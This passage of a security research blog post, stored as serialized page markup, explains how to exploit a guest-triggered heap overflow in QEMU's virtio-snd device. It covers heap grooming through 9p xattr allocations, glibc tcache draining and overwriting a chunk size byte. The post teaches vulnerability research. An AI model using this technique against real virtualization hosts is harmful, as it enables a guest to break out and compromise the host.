",{"type":25,"tag":216,"props":131878,"children":131879},{"style":7047},[131880],{"type":31,"value":131881},"v9fs_xattrcreate",{"type":25,"tag":216,"props":131883,"children":131884},{"style":6964},[131885],{"type":31,"value":1850},{"type":25,"tag":216,"props":131887,"children":131888},{"style":6936},[131889],{"type":31,"value":55595},{"type":25,"tag":216,"props":131891,"children":131892},{"style":6953},[131893],{"type":31,"value":13773},{"type":25,"tag":216,"props":131895,"children":131896},{"style":6947},[131897],{"type":31,"value":131898},"opaque",{"type":25,"tag":216,"props":131900,"children":131901},{"style":6964},[131902],{"type":31,"value":7107},{"type":25,"tag":216,"props":131904,"children":131905},{"class":6922,"line":6769},[131906],{"type":25,"tag":216,"props":131907,"children":131908},{"style":6964},[131909],{"type":31,"value":14836},{"type":25,"tag":216,"props":131911,"children":131912},{"class":6922,"line":6778},[131913,131917,131922,131926,131930],{"type":25,"tag":216,"props":131914,"children":131915},{"style":6936},[131916],{"type":31,"value":23037},{"type":25,"tag":216,"props":131918,"children":131919},{"style":6964},[131920],{"type":31,"value":131921}," flags, rflags ",{"type":25,"tag":216,"props":131923,"children":131924},{"style":6953},[131925],{"type":31,"value":266},{"type":25,"tag":216,"props":131927,"children":131928},{"style":6989},[131929],{"type":31,"value":6992},{"type":25,"tag":216,"props":131931,"children":131932},{"style":6964},[131933],{"type":31,"value":6967},{"type":25,"tag":216,"props":131935,"children":131936},{"class":6922,"line":7005},[131937,131942],{"type":25,"tag":216,"props":131938,"children":131939},{"style":6936},[131940],{"type":31,"value":131941},"    int32_t",{"type":25,"tag":216,"props":131943,"children":131944},{"style":6964},[131945],{"type":31,"value":131946}," fid;\n",{"type":25,"tag":216,"props":131948,"children":131949},{"class":6922,"line":7110},[131950,131954],{"type":25,"tag":216,"props":131951,"children":131952},{"style":6936},[131953],{"type":31,"value":59581},{"type":25,"tag":216,"props":131955,"children":131956},{"style":6964},[131957],{"type":31,"value":128534},{"type":25,"tag":216,"props":131959,"children":131960},{"class":6922,"line":7216},[131961,131966,131971,131975,131979],{"type":25,"tag":216,"props":131962,"children":131963},{"style":6936},[131964],{"type":31,"value":131965},"    ssize_t",{"type":25,"tag":216,"props":131967,"children":131968},{"style":6964},[131969],{"type":31,"value":131970}," err ",{"type":25,"tag":216,"props":131972,"children":131973},{"style":6953},[131974],{"type":31,"value":266},{"type":25,"tag":216,"props":131976,"children":131977},{"style":6989},[131978],{"type":31,"value":6992},{"type":25,"tag":216,"props":131980,"children":131981},{"style":6964},[131982],{"type":31,"value":6967},{"type":25,"tag":216,"props":131984,"children":131985},{"class":6922,"line":7244},[131986],{"type":25,"tag":216,"props":131987,"children":131988},{"style":6964},[131989],{"type":31,"value":131990},"    V9fsString name;\n",{"type":25,"tag":216,"props":131992,"children":131993},{"class":6922,"line":7257},[131994,131998,132003,132007,132012],{"type":25,"tag":216,"props":131995,"children":131996},{"style":6936},[131997],{"type":31,"value":20523},{"type":25,"tag":216,"props":131999,"children":132000},{"style":6964},[132001],{"type":31,"value":132002}," offset ",{"type":25,"tag":216,"props":132004,"children":132005},{"style":6953},[132006],{"type":31,"value":266},{"type":25,"tag":216,"props":132008,"children":132009},{"style":6989},[132010],{"type":31,"value":132011}," 7",{"type":25,"tag":216,"props":132013,"children":132014},{"style":6964},[132015],{"type":31,"value":6967},{"type":25,"tag":216,"props":132017,"children":132018},{"class":6922,"line":7275},[132019,132024,132028],{"type":25,"tag":216,"props":132020,"children":132021},{"style":6964},[132022],{"type":31,"value":132023},"    V9fsFidState ",{"type":25,"tag":216,"props":132025,"children":132026},{"style":6953},[132027],{"type":31,"value":8519},{"type":25,"tag":216,"props":132029,"children":132030},{"style":6964},[132031],{"type":31,"value":132032},"file_fidp;\n",{"type":25,"tag":216,"props":132034,"children":132035},{"class":6922,"line":7296},[132036,132040,132044],{"type":25,"tag":216,"props":132037,"children":132038},{"style":6964},[132039],{"type":31,"value":132023},{"type":25,"tag":216,"props":132041,"children":132042},{"style":6953},[132043],{"type":31,"value":8519},{"type":25,"tag":216,"props":132045,"children":132046},{"style":6964},[132047],{"type":31,"value":132048},"xattr_fidp;\n",{"type":25,"tag":216,"props":132050,"children":132051},{"class":6922,"line":7305},[132052,132057,132061,132066,132070],{"type":25,"tag":216,"props":132053,"children":132054},{"style":6964},[132055],{"type":31,"value":132056},"    V9fsPDU ",{"type":25,"tag":216,"props":132058,"children":132059},{"style":6953},[132060],{"type":31,"value":8519},{"type":25,"tag":216,"props":132062,"children":132063},{"style":6964},[132064],{"type":31,"value":132065},"pdu ",{"type":25,"tag":216,"props":132067,"children":132068},{"style":6953},[132069],{"type":31,"value":266},{"type":25,"tag":216,"props":132071,"children":132072},{"style":6964},[132073],{"type":31,"value":132074}," opaque;\n",{"type":25,"tag":216,"props":132076,"children":132077},{"class":6922,"line":7557},[132078],{"type":25,"tag":216,"props":132079,"children":132080},{"emptyLinePlaceholder":16},[132081],{"type":31,"value":7642},{"type":25,"tag":216,"props":132083,"children":132084},{"class":6922,"line":7574},[132085,132090,132094,132098],{"type":25,"tag":216,"props":132086,"children":132087},{"style":7047},[132088],{"type":31,"value":132089},"    v9fs_string_init",{"type":25,"tag":216,"props":132091,"children":132092},{"style":6964},[132093],{"type":31,"value":1850},{"type":25,"tag":216,"props":132095,"children":132096},{"style":6953},[132097],{"type":31,"value":7059},{"type":25,"tag":216,"props":132099,"children":132100},{"style":6964},[132101],{"type":31,"value":132102},"name);\n",{"type":25,"tag":216,"props":132104,"children":132105},{"class":6922,"line":7591},[132106,132111,132115,132120,132125,132130,132134,132138,132143,132147,132152,132156,132160,132164],{"type":25,"tag":216,"props":132107,"children":132108},{"style":6964},[132109],{"type":31,"value":132110},"    err ",{"type":25,"tag":216,"props":132112,"children":132113},{"style":6953},[132114],{"type":31,"value":266},{"type":25,"tag":216,"props":132116,"children":132117},{"style":7047},[132118],{"type":31,"value":132119}," pdu_unmarshal",{"type":25,"tag":216,"props":132121,"children":132122},{"style":6964},[132123],{"type":31,"value":132124},"(pdu, offset, ",{"type":25,"tag":216,"props":132126,"children":132127},{"style":8205},[132128],{"type":31,"value":132129},"\"dsqd\"",{"type":25,"tag":216,"props":132131,"children":132132},{"style":6964},[132133],{"type":31,"value":7026},{"type":25,"tag":216,"props":132135,"children":132136},{"style":6953},[132137],{"type":31,"value":7059},{"type":25,"tag":216,"props":132139,"children":132140},{"style":6964},[132141],{"type":31,"value":132142},"fid, ",{"type":25,"tag":216,"props":132144,"children":132145},{"style":6953},[132146],{"type":31,"value":7059},{"type":25,"tag":216,"props":132148,"children":132149},{"style":6964},[132150],{"type":31,"value":132151},"name, ",{"type":25,"tag":216,"props":132153,"children":132154},{"style":6953},[132155],{"type":31,"value":7059},{"type":25,"tag":216,"props":132157,"children":132158},{"style":6964},[132159],{"type":31,"value":130902},{"type":25,"tag":216,"props":132161,"children":132162},{"style":6953},[132163],{"type":31,"value":7059},{"type":25,"tag":216,"props":132165,"children":132166},{"style":6964},[132167],{"type":31,"value":132168},"flags);\n",{"type":25,"tag":216,"props":132170,"children":132171},{"class":6922,"line":7604},[132172,132176,132181,132185,132189],{"type":25,"tag":216,"props":132173,"children":132174},{"style":6973},[132175],{"type":31,"value":16235},{"type":25,"tag":216,"props":132177,"children":132178},{"style":6964},[132179],{"type":31,"value":132180}," (err ",{"type":25,"tag":216,"props":132182,"children":132183},{"style":6953},[132184],{"type":31,"value":9757},{"type":25,"tag":216,"props":132186,"children":132187},{"style":6989},[132188],{"type":31,"value":6992},{"type":25,"tag":216,"props":132190,"children":132191},{"style":6964},[132192],{"type":31,"value":18761},{"type":25,"tag":216,"props":132194,"children":132195},{"class":6922,"line":7613},[132196,132201],{"type":25,"tag":216,"props":132197,"children":132198},{"style":6973},[132199],{"type":31,"value":132200},"        goto",{"type":25,"tag":216,"props":132202,"children":132203},{"style":6964},[132204],{"type":31,"value":132205}," out_nofid;\n",{"type":25,"tag":216,"props":132207,"children":132208},{"class":6922,"line":7636},[132209],{"type":25,"tag":216,"props":132210,"children":132211},{"style":6964},[132212],{"type":31,"value":7311},{"type":25,"tag":216,"props":132214,"children":132215},{"class":6922,"line":7645},[132216],{"type":25,"tag":216,"props":132217,"children":132218},{"emptyLinePlaceholder":16},[132219],{"type":31,"value":7642},{"type":25,"tag":216,"props":132221,"children":132222},{"class":6922,"line":7654},[132223],{"type":25,"tag":216,"props":132224,"children":132225},{"style":6964},[132226],{"type":31,"value":108759},{"type":25,"tag":216,"props":132228,"children":132229},{"class":6922,"line":7722},[132230],{"type":25,"tag":216,"props":132231,"children":132232},{"emptyLinePlaceholder":16},[132233],{"type":31,"value":7642},{"type":25,"tag":216,"props":132235,"children":132236},{"class":6922,"line":7730},[132237,132241,132245,132249],{"type":25,"tag":216,"props":132238,"children":132239},{"style":6973},[132240],{"type":31,"value":16235},{"type":25,"tag":216,"props":132242,"children":132243},{"style":6964},[132244],{"type":31,"value":131003},{"type":25,"tag":216,"props":132246,"children":132247},{"style":6953},[132248],{"type":31,"value":5902},{"type":25,"tag":216,"props":132250,"children":132251},{"style":6964},[132252],{"type":31,"value":132253}," P9_XATTR_SIZE_MAX) {\n",{"type":25,"tag":216,"props":132255,"children":132256},{"class":6922,"line":7760},[132257,132262,132266,132270],{"type":25,"tag":216,"props":132258,"children":132259},{"style":6964},[132260],{"type":31,"value":132261},"        err ",{"type":25,"tag":216,"props":132263,"children":132264},{"style":6953},[132265],{"type":31,"value":266},{"type":25,"tag":216,"props":132267,"children":132268},{"style":6953},[132269],{"type":31,"value":55224},{"type":25,"tag":216,"props":132271,"children":132272},{"style":6964},[132273],{"type":31,"value":132274},"E2BIG;\n",{"type":25,"tag":216,"props":132276,"children":132277},{"class":6922,"line":7768},[132278,132282],{"type":25,"tag":216,"props":132279,"children":132280},{"style":6973},[132281],{"type":31,"value":132200},{"type":25,"tag":216,"props":132283,"children":132284},{"style":6964},[132285],{"type":31,"value":132205},{"type":25,"tag":216,"props":132287,"children":132288},{"class":6922,"line":7800},[132289],{"type":25,"tag":216,"props":132290,"children":132291},{"style":6964},[132292],{"type":31,"value":7311},{"type":25,"tag":216,"props":132294,"children":132295},{"class":6922,"line":7808},[132296],{"type":25,"tag":216,"props":132297,"children":132298},{"emptyLinePlaceholder":16},[132299],{"type":31,"value":7642},{"type":25,"tag":216,"props":132301,"children":132302},{"class":6922,"line":7868},[132303],{"type":25,"tag":216,"props":132304,"children":132305},{"style":6964},[132306],{"type":31,"value":108759},{"type":25,"tag":216,"props":132308,"children":132309},{"class":6922,"line":13001},[132310],{"type":25,"tag":216,"props":132311,"children":132312},{"emptyLinePlaceholder":16},[132313],{"type":31,"value":7642},{"type":25,"tag":216,"props":132315,"children":132316},{"class":6922,"line":13019},[132317,132321,132325,132329,132334,132338,132342,132346,132351,132355,132359],{"type":25,"tag":216,"props":132318,"children":132319},{"style":7047},[132320],{"type":31,"value":132089},{"type":25,"tag":216,"props":132322,"children":132323},{"style":6964},[132324],{"type":31,"value":1850},{"type":25,"tag":216,"props":132326,"children":132327},{"style":6953},[132328],{"type":31,"value":7059},{"type":25,"tag":216,"props":132330,"children":132331},{"style":6947},[132332],{"type":31,"value":132333},"xattr_fidp",{"type":25,"tag":216,"props":132335,"children":132336},{"style":6964},[132337],{"type":31,"value":17714},{"type":25,"tag":216,"props":132339,"children":132340},{"style":6947},[132341],{"type":31,"value":40945},{"type":25,"tag":216,"props":132343,"children":132344},{"style":6964},[132345],{"type":31,"value":179},{"type":25,"tag":216,"props":132347,"children":132348},{"style":6947},[132349],{"type":31,"value":132350},"xattr",{"type":25,"tag":216,"props":132352,"children":132353},{"style":6964},[132354],{"type":31,"value":179},{"type":25,"tag":216,"props":132356,"children":132357},{"style":6947},[132358],{"type":31,"value":52467},{"type":25,"tag":216,"props":132360,"children":132361},{"style":6964},[132362],{"type":31,"value":7797},{"type":25,"tag":216,"props":132364,"children":132365},{"class":6922,"line":13064},[132366,132371,132375,132379,132383,132387,132391,132395,132399,132403,132407,132411,132415],{"type":25,"tag":216,"props":132367,"children":132368},{"style":7047},[132369],{"type":31,"value":132370},"    v9fs_string_copy",{"type":25,"tag":216,"props":132372,"children":132373},{"style":6964},[132374],{"type":31,"value":1850},{"type":25,"tag":216,"props":132376,"children":132377},{"style":6953},[132378],{"type":31,"value":7059},{"type":25,"tag":216,"props":132380,"children":132381},{"style":6947},[132382],{"type":31,"value":132333},{"type":25,"tag":216,"props":132384,"children":132385},{"style":6964},[132386],{"type":31,"value":17714},{"type":25,"tag":216,"props":132388,"children":132389},{"style":6947},[132390],{"type":31,"value":40945},{"type":25,"tag":216,"props":132392,"children":132393},{"style":6964},[132394],{"type":31,"value":179},{"type":25,"tag":216,"props":132396,"children":132397},{"style":6947},[132398],{"type":31,"value":132350},{"type":25,"tag":216,"props":132400,"children":132401},{"style":6964},[132402],{"type":31,"value":179},{"type":25,"tag":216,"props":132404,"children":132405},{"style":6947},[132406],{"type":31,"value":52467},{"type":25,"tag":216,"props":132408,"children":132409},{"style":6964},[132410],{"type":31,"value":7026},{"type":25,"tag":216,"props":132412,"children":132413},{"style":6953},[132414],{"type":31,"value":7059},{"type":25,"tag":216,"props":132416,"children":132417},{"style":6964},[132418],{"type":31,"value":132102},{"type":25,"tag":216,"props":132420,"children":132421},{"class":6922,"line":13170},[132422,132427,132431,132435,132439,132443,132447,132451,132455,132459],{"type":25,"tag":216,"props":132423,"children":132424},{"style":6947},[132425],{"type":31,"value":132426},"    xattr_fidp",{"type":25,"tag":216,"props":132428,"children":132429},{"style":6964},[132430],{"type":31,"value":17714},{"type":25,"tag":216,"props":132432,"children":132433},{"style":6947},[132434],{"type":31,"value":40945},{"type":25,"tag":216,"props":132436,"children":132437},{"style":6964},[132438],{"type":31,"value":179},{"type":25,"tag":216,"props":132440,"children":132441},{"style":6947},[132442],{"type":31,"value":132350},{"type":25,"tag":216,"props":132444,"children":132445},{"style":6964},[132446],{"type":31,"value":179},{"type":25,"tag":216,"props":132448,"children":132449},{"style":6947},[132450],{"type":31,"value":43115},{"type":25,"tag":216,"props":132452,"children":132453},{"style":6953},[132454],{"type":31,"value":6956},{"type":25,"tag":216,"props":132456,"children":132457},{"style":7047},[132458],{"type":31,"value":128105},{"type":25,"tag":216,"props":132460,"children":132461},{"style":6964},[132462],{"type":31,"value":132463},"(size);\n",{"type":25,"tag":216,"props":132465,"children":132466},{"class":6922,"line":27455},[132467],{"type":25,"tag":216,"props":132468,"children":132469},{"style":6964},[132470],{"type":31,"value":7874},{"type":25,"tag":38,"props":132472,"children":132473},{},[132474,132476,132481,132483,132488,132489,132494,132496,132501],{"type":31,"value":132475},"Because the ",{"type":25,"tag":82,"props":132477,"children":132479},{"className":132478},[],[132480],{"type":31,"value":131837},{"type":31,"value":132482}," field is handled as a string, embedded null bytes are not preserved, which makes it less useful for our purposes. It also introduces some extra allocation noise into the heap, since creating an xattr allocates both ",{"type":25,"tag":82,"props":132484,"children":132486},{"className":132485},[],[132487],{"type":31,"value":131837},{"type":31,"value":1307},{"type":25,"tag":82,"props":132490,"children":132492},{"className":132491},[],[132493],{"type":31,"value":131844},{"type":31,"value":132495},", not just the ",{"type":25,"tag":82,"props":132497,"children":132499},{"className":132498},[],[132500],{"type":31,"value":131844},{"type":31,"value":132502}," we actually care about. But we will get around this later in the blog post.",{"type":25,"tag":38,"props":132504,"children":132505},{},[132506,132507,132512],{"type":31,"value":474},{"type":25,"tag":82,"props":132508,"children":132510},{"className":132509},[],[132511],{"type":31,"value":131844},{"type":31,"value":132513}," field, however, is much more interesting: it gives us a guest-controlled heap allocation of an arbitrary size. Each of these allocations is tied to its own xattr FID, which means it stays alive for as long as that FID remains live. In practice, this gives us a large number of persistent host-side heap objects that we can manage individually.",{"type":25,"tag":38,"props":132515,"children":132516},{},[132517,132519,132524,132526,132532,132534,132540,132542,132548],{"type":31,"value":132518},"Once allocated, we can write arbitrary bytes into the ",{"type":25,"tag":82,"props":132520,"children":132522},{"className":132521},[],[132523],{"type":31,"value":131844},{"type":31,"value":132525}," buffer through a ",{"type":25,"tag":82,"props":132527,"children":132529},{"className":132528},[],[132530],{"type":31,"value":132531},"P9_TWRITE",{"type":31,"value":132533}," request on the corresponding xattr FID. We can also read the contents back with ",{"type":25,"tag":82,"props":132535,"children":132537},{"className":132536},[],[132538],{"type":31,"value":132539},"P9_TREAD",{"type":31,"value":132541},", which is useful later when turning overlap into stronger primitives. Finally, we can free any individual allocation at any time by issuing a ",{"type":25,"tag":82,"props":132543,"children":132545},{"className":132544},[],[132546],{"type":31,"value":132547},"P9_TCLUNK",{"type":31,"value":132549}," request on that same FID.",{"type":25,"tag":38,"props":132551,"children":132552},{},[132553,132555,132561],{"type":31,"value":132554},"This gives us a very strong heap shaping primitive in QEMU - allocate on demand, choose the size precisely (up to ",{"type":25,"tag":82,"props":132556,"children":132558},{"className":132557},[],[132559],{"type":31,"value":132560},"65536",{"type":31,"value":132562}," bytes, which is more than enough here), fully control the contents of the allocation, keep it alive as long as needed, and free it selectively later.",{"type":25,"tag":606,"props":132564,"children":132566},{"id":132565},"setting-the-heap-layout",[132567],{"type":31,"value":132568},"Setting the Heap Layout",{"type":25,"tag":38,"props":132570,"children":132571},{},[132572,132574,132579],{"type":31,"value":132573},"Ideally, we want a contiguous heap region consisting only of ",{"type":25,"tag":82,"props":132575,"children":132577},{"className":132576},[],[132578],{"type":31,"value":131844},{"type":31,"value":132580}," allocations, like this:",{"type":25,"tag":206,"props":132582,"children":132584},{"code":132583},"   0x200      0x200      0x200      0x200      0x200\n+----------+----------+----------+----------+----------+\n|          |          |          |          |          |\n| .value A | .value B | .value C | .value D | .value E |\n|          |          |          |          |          |\n+----------+----------+----------+----------+----------+\n",[132585],{"type":25,"tag":82,"props":132586,"children":132587},{"__ignoreMap":7},[132588],{"type":31,"value":132583},{"type":25,"tag":38,"props":132590,"children":132591},{},[132592,132594,132599,132601,132606,132608,132613],{"type":31,"value":132593},"This lets us later create holes by freeing every other ",{"type":25,"tag":82,"props":132595,"children":132597},{"className":132596},[],[132598],{"type":31,"value":131844},{"type":31,"value":132600}," allocation. Those freed chunks enter the freelist, allowing the overflowing virtio-snd buffer to be allocated into one of those holes and overflow into the ",{"type":25,"tag":82,"props":132602,"children":132604},{"className":132603},[],[132605],{"type":31,"value":128192},{"type":31,"value":132607}," field of the next live ",{"type":25,"tag":82,"props":132609,"children":132611},{"className":132610},[],[132612],{"type":31,"value":131844},{"type":31,"value":132614}," chunk.",{"type":25,"tag":38,"props":132616,"children":132617},{},[132618],{"type":31,"value":132619},"Of course, we do not know the initial state of the heap. In practice, it is fragmented and already contains many freelist entries. Fortunately, this is not a problem for glibc, since the allocator is deterministic. By allocating enough chunks of the size we want, malloc will first consume any suitable entries already present in the freelist. Once those are exhausted, subsequent allocations will be served from the top chunk in a contiguous fashion, giving us the continuous region we need.",{"type":25,"tag":38,"props":132621,"children":132622},{},[132623,132625,132630,132632,132637,132639,132644,132646,132651],{"type":31,"value":132624},"As mentioned earlier, ",{"type":25,"tag":82,"props":132626,"children":132628},{"className":132627},[],[132629],{"type":31,"value":131881},{"type":31,"value":132631}," always allocates two chunks: one for ",{"type":25,"tag":82,"props":132633,"children":132635},{"className":132634},[],[132636],{"type":31,"value":131837},{"type":31,"value":132638}," and one for ",{"type":25,"tag":82,"props":132640,"children":132642},{"className":132641},[],[132643],{"type":31,"value":131844},{"type":31,"value":132645},". We want to avoid having ",{"type":25,"tag":82,"props":132647,"children":132649},{"className":132648},[],[132650],{"type":31,"value":131837},{"type":31,"value":132652}," chunks inside our main contiguous region. There are two ways to approach this:",{"type":25,"tag":6711,"props":132654,"children":132655},{},[132656,132668],{"type":25,"tag":2043,"props":132657,"children":132658},{},[132659,132661,132666],{"type":31,"value":132660},"Make ",{"type":25,"tag":82,"props":132662,"children":132664},{"className":132663},[],[132665],{"type":31,"value":131837},{"type":31,"value":132667}," larger than the mmap threshold, so it is allocated from a separate mapping rather than from the main heap. This would give us the layout we want, but at the cost of dramatically increasing memory usage during heap spraying.",{"type":25,"tag":2043,"props":132669,"children":132670},{},[132671,132673,132678,132680,132685,132687,132692],{"type":31,"value":132672},"Prepare a separate region whose sole purpose is to absorb ",{"type":25,"tag":82,"props":132674,"children":132676},{"className":132675},[],[132677],{"type":31,"value":131837},{"type":31,"value":132679},"-sized allocations. Later, when we start building the main contiguous region, malloc will satisfy ",{"type":25,"tag":82,"props":132681,"children":132683},{"className":132682},[],[132684],{"type":31,"value":131837},{"type":31,"value":132686}," allocations from that separate freelist instead of placing them next to our ",{"type":25,"tag":82,"props":132688,"children":132690},{"className":132689},[],[132691],{"type":31,"value":131844},{"type":31,"value":132693}," chunks.",{"type":25,"tag":630,"props":132695,"children":132697},{"id":132696},"separating-name-allocations",[132698],{"type":31,"value":132699},"Separating .name allocations",{"type":25,"tag":38,"props":132701,"children":132702},{},[132703,132705,132710,132712,132717],{"type":31,"value":132704},"We chose the second option. However, it is not as simple as issuing ",{"type":25,"tag":82,"props":132706,"children":132708},{"className":132707},[],[132709],{"type":31,"value":131881},{"type":31,"value":132711}," for N ",{"type":25,"tag":82,"props":132713,"children":132715},{"className":132714},[],[132716],{"type":31,"value":131837},{"type":31,"value":132718},"-sized allocations and then freeing them.",{"type":25,"tag":38,"props":132720,"children":132721},{},[132722,132724,132729,132730,132735,132736,132741,132743,132748,132750,132755],{"type":31,"value":132723},"At this point, we already know that ",{"type":25,"tag":82,"props":132725,"children":132727},{"className":132726},[],[132728],{"type":31,"value":131881},{"type":31,"value":132631},{"type":25,"tag":82,"props":132731,"children":132733},{"className":132732},[],[132734],{"type":31,"value":131837},{"type":31,"value":132638},{"type":25,"tag":82,"props":132737,"children":132739},{"className":132738},[],[132740],{"type":31,"value":131844},{"type":31,"value":132742},". If we simply call it with ",{"type":25,"tag":82,"props":132744,"children":132746},{"className":132745},[],[132747],{"type":31,"value":131844},{"type":31,"value":132749}," sized the same as ",{"type":25,"tag":82,"props":132751,"children":132753},{"className":132752},[],[132754],{"type":31,"value":131837},{"type":31,"value":132756},", we get a layout like this:",{"type":25,"tag":206,"props":132758,"children":132760},{"code":132759},"    0x20       0x20       0x20       0x20       0x20\n+----------+----------+----------+----------+----------+\n|          |          |          |          |          |\n| .name  A | .value A | .name  B | .value B | .name  C |\n|          |          |          |          |          |\n+----------+----------+----------+----------+----------+\n",[132761],{"type":25,"tag":82,"props":132762,"children":132763},{"__ignoreMap":7},[132764],{"type":31,"value":132759},{"type":25,"tag":38,"props":132766,"children":132767},{},[132768,132770,132775,132777,132783,132785,132791,132793,132798,132800,132805,132807,132812],{"type":31,"value":132769},"With that heap state, issuing a ",{"type":25,"tag":82,"props":132771,"children":132773},{"className":132772},[],[132774],{"type":31,"value":132547},{"type":31,"value":132776}," request would first free ",{"type":25,"tag":82,"props":132778,"children":132780},{"className":132779},[],[132781],{"type":31,"value":132782},".name A",{"type":31,"value":132784}," and then ",{"type":25,"tag":82,"props":132786,"children":132788},{"className":132787},[],[132789],{"type":31,"value":132790},".value A",{"type":31,"value":132792},". When ",{"type":25,"tag":82,"props":132794,"children":132796},{"className":132795},[],[132797],{"type":31,"value":132790},{"type":31,"value":132799}," is freed, the allocator sees that the preceding chunk ",{"type":25,"tag":82,"props":132801,"children":132803},{"className":132802},[],[132804],{"type":31,"value":132782},{"type":31,"value":132806}," is already free and immediately consolidates the two. As a result, instead of ending up with many reusable ",{"type":25,"tag":82,"props":132808,"children":132810},{"className":132809},[],[132811],{"type":31,"value":131837},{"type":31,"value":132813},"-sized chunks in the freelist, we would just create a large consolidated free chunk, which is not what we want.",{"type":25,"tag":38,"props":132815,"children":132816},{},[132817],{"type":31,"value":132818},"To avoid that, we take advantage of the fact that chunks freed into tcache are not consolidated. It is also important to note that tcache maintains a separate freelist for each size class within the tcache range, and in this glibc version each such freelist can hold up to 16 entries.",{"type":25,"tag":38,"props":132820,"children":132821},{},[132822,132824,132829,132831,132836,132838,132843,132845,132851,132853,132858,132860,132866],{"type":31,"value":132823},"We begin by draining the tcache freelist for every relevant size class by allocating 16 chunks of each size. Throughout this process, the ",{"type":25,"tag":82,"props":132825,"children":132827},{"className":132826},[],[132828],{"type":31,"value":131837},{"type":31,"value":132830}," allocation remains fixed at size ",{"type":25,"tag":82,"props":132832,"children":132834},{"className":132833},[],[132835],{"type":31,"value":109025},{"type":31,"value":132837},". We first allocate 16 xattrs whose ",{"type":25,"tag":82,"props":132839,"children":132841},{"className":132840},[],[132842],{"type":31,"value":131844},{"type":31,"value":132844}," size is ",{"type":25,"tag":82,"props":132846,"children":132848},{"className":132847},[],[132849],{"type":31,"value":132850},"0x30",{"type":31,"value":132852},". After that, we allocate another 16 xattrs, this time with ",{"type":25,"tag":82,"props":132854,"children":132856},{"className":132855},[],[132857],{"type":31,"value":131844},{"type":31,"value":132859}," size ",{"type":25,"tag":82,"props":132861,"children":132863},{"className":132862},[],[132864],{"type":31,"value":132865},"0x40",{"type":31,"value":132867},", and continue in the same way for each tcache size class.",{"type":25,"tag":38,"props":132869,"children":132870},{},[132871],{"type":31,"value":132872},"This yields the following layout:",{"type":25,"tag":206,"props":132874,"children":132876},{"code":132875},"    0x20        0x30         0x20        0x30\n+---------+--------------+---------+--------------+- - - - -\n|         |              |         |              |\n| .name A |   .value A   | .name B |   .value B   |  . . .\n|         |              |         |              |\n+---------+--------------+---------+--------------+- - - - -\n\n    0x20          0x40           0x20           0x40\n+---------+------------------+---------+------------------+- - - - -\n|         |                  |         |                  |\n| .name C |     .value C     | .name D |     .value D     |  . . .\n|         |                  |         |                  |\n+---------+------------------+---------+------------------+- - - - -\n",[132877],{"type":25,"tag":82,"props":132878,"children":132879},{"__ignoreMap":7},[132880],{"type":31,"value":132875},{"type":25,"tag":38,"props":132882,"children":132883},{},[132884,132886,132891,132893,132898,132900,132905,132907,132912,132914,132919,132921,132926,132927,132932,132934,132939,132941,132946,132948,132953,132955,132960,132962,132967],{"type":31,"value":132885},"At this point, we can free all allocations created during this phase. Because we emptied every tcache freelist, the first 16 ",{"type":25,"tag":82,"props":132887,"children":132889},{"className":132888},[],[132890],{"type":31,"value":131837},{"type":31,"value":132892}," chunks end up in the ",{"type":25,"tag":82,"props":132894,"children":132896},{"className":132895},[],[132897],{"type":31,"value":109025},{"type":31,"value":132899}," tcache bin, along with the interleaved ",{"type":25,"tag":82,"props":132901,"children":132903},{"className":132902},[],[132904],{"type":31,"value":131844},{"type":31,"value":132906}," chunks of size ",{"type":25,"tag":82,"props":132908,"children":132910},{"className":132909},[],[132911],{"type":31,"value":132850},{"type":31,"value":132913},". The next 16 ",{"type":25,"tag":82,"props":132915,"children":132917},{"className":132916},[],[132918],{"type":31,"value":131837},{"type":31,"value":132920}," chunks are interleaved with ",{"type":25,"tag":82,"props":132922,"children":132924},{"className":132923},[],[132925],{"type":31,"value":131844},{"type":31,"value":132906},{"type":25,"tag":82,"props":132928,"children":132930},{"className":132929},[],[132931],{"type":31,"value":132865},{"type":31,"value":132933},"; when freed, those ",{"type":25,"tag":82,"props":132935,"children":132937},{"className":132936},[],[132938],{"type":31,"value":131844},{"type":31,"value":132940}," chunks also go into their corresponding tcache bin instead of consolidating with the adjacent free ",{"type":25,"tag":82,"props":132942,"children":132944},{"className":132943},[],[132945],{"type":31,"value":131837},{"type":31,"value":132947}," chunks. Repeating this across all tcache sizes leaves us with a large region of free ",{"type":25,"tag":82,"props":132949,"children":132951},{"className":132950},[],[132952],{"type":31,"value":131837},{"type":31,"value":132954},"-sized chunks that will later be served to the ",{"type":25,"tag":82,"props":132956,"children":132958},{"className":132957},[],[132959],{"type":31,"value":131837},{"type":31,"value":132961}," allocations of the main contiguous spray - leaving us with the desired layout of adjacent ",{"type":25,"tag":82,"props":132963,"children":132965},{"className":132964},[],[132966],{"type":31,"value":131844},{"type":31,"value":132693},{"type":25,"tag":606,"props":132969,"children":132971},{"id":132970},"corrupting-the-size",[132972],{"type":31,"value":132973},"Corrupting the Size",{"type":25,"tag":38,"props":132975,"children":132976},{},[132977,132979,132984,132986,132991,132993,132998,133000,133005,133006,133011],{"type":31,"value":132978},"The input format is guest-controlled, and we choose ",{"type":25,"tag":82,"props":132980,"children":132982},{"className":132981},[],[132983],{"type":31,"value":7378},{"type":31,"value":132985}," (unsigned 8-bit PCM). As noted earlier, silence in ",{"type":25,"tag":82,"props":132987,"children":132989},{"className":132988},[],[132990],{"type":31,"value":7378},{"type":31,"value":132992}," is centered at ",{"type":25,"tag":82,"props":132994,"children":132996},{"className":132995},[],[132997],{"type":31,"value":33400},{"type":31,"value":132999}," (rather than ",{"type":25,"tag":82,"props":133001,"children":133003},{"className":133002},[],[133004],{"type":31,"value":130099},{"type":31,"value":130086},{"type":25,"tag":82,"props":133007,"children":133009},{"className":133008},[],[133010],{"type":31,"value":130077},{"type":31,"value":133012},"), which biases this uncontrolled overflow toward larger byte values and increases the chance that the corrupted size grows.",{"type":25,"tag":38,"props":133014,"children":133015},{},[133016,133018,133023],{"type":31,"value":133017},"As we already concluded, ",{"type":25,"tag":82,"props":133019,"children":133021},{"className":133020},[],[133022],{"type":31,"value":129542},{"type":31,"value":133024}," is called with the amount:",{"type":25,"tag":206,"props":133026,"children":133028},{"code":133027},"MIN(available, (stream->params.period_bytes - buffer->size))\n",[133029],{"type":25,"tag":82,"props":133030,"children":133031},{"__ignoreMap":7},[133032],{"type":31,"value":133027},{"type":25,"tag":38,"props":133034,"children":133035},{},[133036,133038,133043,133045,133050],{"type":31,"value":133037},"And as mentioned earlier, ",{"type":25,"tag":82,"props":133039,"children":133041},{"className":133040},[],[133042],{"type":31,"value":129573},{"type":31,"value":133044}," is fully guest-controlled, so we can set it such that the overflow reaches exactly far enough to overwrite only the lowest byte of the next chunk's 